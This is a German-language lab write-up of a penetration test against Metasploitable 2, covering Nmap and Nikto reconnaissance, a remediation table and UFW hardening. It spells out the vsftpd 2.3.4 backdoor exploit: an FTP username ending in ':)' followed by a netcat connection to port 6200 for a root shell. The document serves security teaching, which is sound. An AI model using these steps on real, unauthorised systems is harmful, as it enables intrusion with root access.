
Kontrolliertes virtuelles Angriffs- & Verteidigungslabor — CVE-2011-2523-Ausnutzung, Nmap-Erkundung, Nikto-Scanning, UFW-Härtung auf Metasploitable 2
Eine kontrollierte virtuelle Umgebung, die reale Angriffs- und Verteidigungsszenarien simuliert
Dieses Labor simuliert einen realen Penetrationstest und eine defensive Härtungsübung in einer vollständig isolierten virtuellen Umgebung. Es demonstriert den gesamten offensiven Sicherheitslebenszyklus – von der Aufklärung bis zur Ausbeutung – und die defensiven Kontrollen, die jedes Risiko mindern würden.
Wichtigstes Ergebnis: Vollständiger Root-Zugriff auf dem Zielrechner in unter 60 Sekunden durch Ausnutzung einer bekannten Hintertür, ohne Anmeldedaten und ohne spezielle Werkzeuge.
| Komponente | Details |
|---|---|
| Hypervisor | VMware Workstation |
| Netzwerk | Host-Only / NAT (vollständig isoliert) |
| Angreifer-BS | Ubuntu 24 LTS |
| Ziel-BS | Metasploitable 2 (Linux 2.6.x) |
| Angreifer-IP | 192.168.148.255 |
| Ziel-IP | 192.168.148.130 |
Reconnaissance → Scanning → Exploitation → Defense & Hardening
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Wichtigste Ergebnisse – insgesamt 23 offene Ports:
nikto -h http://192.168.148.130 -o nikto_before.txt
18 Schwachstellen gefunden, darunter:
phpinfo.php gibt vollständige Serverkonfiguration preis/doc/, /test/vsftpd 2.3.4 enthält eine Hintertür, die durch einen Kompromiss in der Lieferkette eingeführt wurde. Das Senden eines Benutzernamens, der auf :) endet, veranlasst den Server, eine Root-Shell auf Port 6200 zu öffnen.
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200
# Step 3 — Verify access
whoami
# → root
Ergebnis: Vollständiger Root-Zugriff auf das System in < 60 Sekunden erreicht – keine Anmeldedaten, kein Exploit-Framework erforderlich.
Auswirkung: Ein Angreifer mit Root-Zugriff kann jede Datei lesen/ändern/löschen, Malware installieren, Daten exfiltrieren oder zu anderen Hosts im Netzwerk wechseln.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH only
sudo ufw status verbose
Siehe report.md für die vollständige Bewertung – vollständige Methodik, Befehlsausgaben, Ergebnistabelle, Ausbeutungsschritte und alle Abhilfeempfehlungen.
Dieses Labor wurde in einer vollständig isolierten virtuellen Umgebung mit absichtlich anfälliger Software (Metasploitable 2) durchgeführt. Alle Techniken dienen nur zu Bildungs- und Portfoliozwecken. Nicht auf Systemen replizieren, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
Autor: Amir Mohammad Marwi
| Port | Dienst | Version | Risiko |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 KRITISCH – Bekannte Hintertür (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 MITTEL – Veraltet |
| 23 | Telnet | Linux telnetd | 🟠 HOCH – Klartext-Protokoll |
| 80 | HTTP | Apache 2.2.8 | 🟠 HOCH – Mehrere CVEs |
| 1524 | Bindshell | Root-Shell | 🔴 KRITISCH – Offene Root-Shell |
| 3306 | MySQL | 5.0.51a | 🟠 HOCH – Datenbank freigelegt |
| 5900 | VNC | Protocol 3.3 | 🟠 HOCH – Schwache Authentifizierung |
| 6667 | IRC | UnrealIRCd | 🔴 KRITISCH – Bekannte Hintertür |
| Schwachstelle | Behebung |
|---|
| vsftpd 2.3.4 Hintertür | Upgrade auf vsftpd 3.x oder Migration zu SFTP |
| Offene Root-Shell (Port 1524) | Sofort deaktivieren, Installation überprüfen |
| Telnet (Port 23) | Deaktivieren – nur SSH erzwingen |
| phpMyAdmin freigelegt | Per IP einschränken, starke Authentifizierung verlangen |
| MySQL freigelegt (Port 3306) | An localhost binden, externen Zugriff blockieren |
| VNC freigelegt (Port 5900) | Per IP einschränken oder deaktivieren |
| Verzeichnis-Indizierung | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Veralteter Apache + PHP | Upgrade auf unterstützte LTS-Versionen |
| Werkzeug | Zweck |
|---|
| Nmap | Port-Scanning und Dienst-Erkennung |
| Nikto | Web-Schwachstellenscan |
| Netcat | Verbindung zur Hintertür-Shell |
| UFW | Host-basierte Firewall-Konfiguration |
| FTP-Client | Auslösen der vsftpd-Hintertür |
| VMware Workstation | Labor-Virtualisierung |